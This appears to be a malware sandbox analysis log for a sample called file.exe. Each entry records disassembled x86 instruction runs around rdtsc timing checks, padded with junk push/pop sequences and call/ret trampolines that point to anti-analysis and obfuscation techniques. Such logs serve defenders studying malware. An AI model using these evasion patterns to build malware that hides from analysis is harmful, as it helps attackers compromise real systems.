Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1192485 second address: 119248F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119248F second address: 1192495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1192495 second address: 11924A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11924A1 second address: 11924C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E4E9B9F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FD0E4E9B9ECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1192FFB second address: 119302E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E506DD0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c jnl 00007FD0E506DD0Eh 0x00000012 push eax 0x00000013 mov dword ptr [ebp+122D205Fh], ecx 0x00000019 pop edi 0x0000001a sub dword ptr [ebp+122D260Ah], ebx 0x00000020 push eax 0x00000021 jnl 00007FD0E506DD14h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119302E second address: 1193032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119309F second address: 11930A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1193197 second address: 11931A4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD0E4E9B9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1193270 second address: 1193277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1193A1C second address: 1193A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov dword ptr [ebp+122D2102h], eax 0x0000000e push 00000000h 0x00000010 mov esi, 4523C23Dh 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007FD0E4E9B9E8h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D24F2h], eax 0x00000037 xchg eax, ebx 0x00000038 jmp 00007FD0E4E9B9F8h 0x0000003d push eax 0x0000003e pushad 0x0000003f js 00007FD0E4E9B9ECh 0x00000045 jno 00007FD0E4E9B9E6h 0x0000004b push ecx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11955B1 second address: 11955B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1195C57 second address: 1195C60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1196E1A second address: 1196E24 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD0E506DD06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1196E24 second address: 1196EA2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD0E4E9B9E8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D1A30h], edi 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007FD0E4E9B9E8h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 jns 00007FD0E4E9B9F3h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c call 00007FD0E4E9B9E8h 0x00000041 pop ecx 0x00000042 mov dword ptr [esp+04h], ecx 0x00000046 add dword ptr [esp+04h], 00000019h 0x0000004e inc ecx 0x0000004f push ecx 0x00000050 ret 0x00000051 pop ecx 0x00000052 ret 0x00000053 mov di, 91E2h 0x00000057 or esi, dword ptr [ebp+122D17F3h] 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push ebx 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1196EA2 second address: 1196EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11989D5 second address: 11989E3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD0E4E9B9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11989E3 second address: 11989E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11989E7 second address: 11989EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11989EB second address: 11989F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1199059 second address: 119905F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119905F second address: 1199071 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FD0E506DD06h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1199071 second address: 1199075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1199B1D second address: 1199B3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0E506DD19h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119C1BF second address: 119C1C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD0E4E9B9E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119C1C9 second address: 119C1CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 114DE90 second address: 114DE96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 114DE96 second address: 114DEAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0E506DD12h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 114DEAC second address: 114DEB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119D244 second address: 119D26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov esi, dword ptr [ebp+122D23D2h] 0x0000000e push 00000000h 0x00000010 cld 0x00000011 push 00000000h 0x00000013 jmp 00007FD0E506DD12h 0x00000018 push eax 0x00000019 push edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119D26F second address: 119D273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119D273 second address: 119D277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A01F7 second address: 11A01FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A1782 second address: 11A1787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A1787 second address: 11A17F6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FD0E4E9B9ECh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov edi, dword ptr [ebp+122D36F4h] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007FD0E4E9B9E8h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e jmp 00007FD0E4E9B9EEh 0x00000033 call 00007FD0E4E9B9F1h 0x00000038 mov ebx, dword ptr [ebp+122D3794h] 0x0000003e pop ebx 0x0000003f push 00000000h 0x00000041 sub edi, dword ptr [ebp+122D1A34h] 0x00000047 xchg eax, esi 0x00000048 push ecx 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A17F6 second address: 11A1804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A091D second address: 11A0923 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A289C second address: 11A28B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD0E506DD0Bh 0x0000000b popad 0x0000000c push eax 0x0000000d jc 00007FD0E506DD14h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A28B8 second address: 11A28BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A1A49 second address: 11A1A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A1A4D second address: 11A1A51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A1A51 second address: 11A1A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A3986 second address: 11A398C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A2AC0 second address: 11A2AD9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FD0E506DD0Dh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A398C second address: 11A3A18 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FD0E4E9B9E8h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 sub dword ptr [ebp+124460CCh], edx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007FD0E4E9B9E8h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 0000001Ch 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 push 00000000h 0x00000047 push 00000000h 0x00000049 push esi 0x0000004a call 00007FD0E4E9B9E8h 0x0000004f pop esi 0x00000050 mov dword ptr [esp+04h], esi 0x00000054 add dword ptr [esp+04h], 00000015h 0x0000005c inc esi 0x0000005d push esi 0x0000005e ret 0x0000005f pop esi 0x00000060 ret 0x00000061 sub dword ptr [ebp+122D19C6h], esi 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FD0E4E9B9F2h 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A4AD6 second address: 11A4AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD0E506DD06h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A4AE1 second address: 11A4B5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E4E9B9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FD0E4E9B9E8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 push 00000000h 0x00000026 clc 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007FD0E4E9B9E8h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 mov dword ptr [ebp+122D23F6h], ebx 0x00000049 stc 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push edx 0x0000004e jno 00007FD0E4E9B9E6h 0x00000054 pop edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A4B5B second address: 11A4B60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A3BB4 second address: 11A3BC2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD0E4E9B9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A4C87 second address: 11A4C91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FD0E506DD06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A4C91 second address: 11A4C95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A4C95 second address: 11A4CB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD0E506DD19h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A5CB0 second address: 11A5CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A5CB4 second address: 11A5CB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A5CB8 second address: 11A5CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A7C9F second address: 11A7CCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FD0E506DD19h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 js 00007FD0E506DD06h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A5CBE second address: 11A5CE0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FD0E4E9B9F7h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A5CE0 second address: 11A5CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A5CE9 second address: 11A5CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A6DC4 second address: 11A6DD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FD0E506DD06h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A5DC7 second address: 11A5DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A6DD7 second address: 11A6DE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E506DD0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A6DE8 second address: 11A6DFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0E4E9B9EEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A5DCD second address: 11A5DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A5DD2 second address: 11A5DE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0E4E9B9F3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A5DE9 second address: 11A5DED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AD172 second address: 11AD177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AD177 second address: 11AD226 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E506DD10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FD0E506DD08h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 call 00007FD0E506DD15h 0x0000002b sub bx, 46B3h 0x00000030 pop ebx 0x00000031 sub dword ptr [ebp+122D26A2h], ecx 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c call 00007FD0E506DD08h 0x00000041 pop ecx 0x00000042 mov dword ptr [esp+04h], ecx 0x00000046 add dword ptr [esp+04h], 00000015h 0x0000004e inc ecx 0x0000004f push ecx 0x00000050 ret 0x00000051 pop ecx 0x00000052 ret 0x00000053 push 00000000h 0x00000055 push 00000000h 0x00000057 push edx 0x00000058 call 00007FD0E506DD08h 0x0000005d pop edx 0x0000005e mov dword ptr [esp+04h], edx 0x00000062 add dword ptr [esp+04h], 00000018h 0x0000006a inc edx 0x0000006b push edx 0x0000006c ret 0x0000006d pop edx 0x0000006e ret 0x0000006f mov ebx, dword ptr [ebp+122D34C0h] 0x00000075 xchg eax, esi 0x00000076 push eax 0x00000077 push edx 0x00000078 jmp 00007FD0E506DD0Eh 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AE14D second address: 11AE15F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD0E4E9B9E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AD3C9 second address: 11AD3CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AD3CE second address: 11AD3DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AD3DE second address: 11AD3E4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B008E second address: 11B0125 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD0E4E9B9FBh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FD0E4E9B9F8h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FD0E4E9B9E8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d mov ebx, dword ptr [ebp+12471805h] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007FD0E4E9B9E8h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 0000001Bh 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f push eax 0x00000050 add edi, dword ptr [ebp+122D35E8h] 0x00000056 pop ebx 0x00000057 xchg eax, esi 0x00000058 push ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b push edx 0x0000005c pop edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B0125 second address: 11B0146 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E506DD16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B0146 second address: 11B014A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11AF2F2 second address: 11AF2F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B0352 second address: 11B0368 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E4E9B9ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B0368 second address: 11B036D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B036D second address: 11B0373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B136A second address: 11B1378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0E506DD0Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11B4130 second address: 11B413A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD0E4E9B9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
